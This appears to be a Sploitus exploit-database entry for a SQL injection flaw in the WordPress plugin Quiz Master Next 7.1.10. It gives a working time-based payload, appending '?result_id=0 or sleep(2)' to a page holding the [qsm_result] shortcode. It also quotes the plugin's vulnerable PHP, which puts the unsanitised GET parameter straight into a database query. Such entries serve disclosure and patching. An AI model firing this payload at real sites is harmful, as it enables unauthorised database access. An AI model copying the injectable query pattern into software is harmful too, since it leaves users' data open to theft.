## https://sploitus.com/exploit?id=WPEX-ID:3B52B25C-82A1-41C7-83AC-92E244F7C5AB
https://drive.google.com/file/d/1axeL8lGH1gFSOEoOFtgGV6xsrNlxJXQB/view?usp=sharing
As an author, create a post/page with the shortcode [qsm_result], view the created page/post and append ?result_id=0 or sleep(2)
// https://plugins.svn.wordpress.org/quiz-master-next/tags/7.1.10/php/classes/class-qmn-quiz-manager.php
public function shortcode_display_result($atts){
extract(shortcode_atts(array(
'id' => 0,
), $atts));
ob_start();
if($id == 0){
$id = isset($_GET['result_id']) ? $_GET['result_id'] : 0;
}
global $wpdb;
$result_data = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}mlw_results WHERE result_id = {$id}", ARRAY_A);
...
}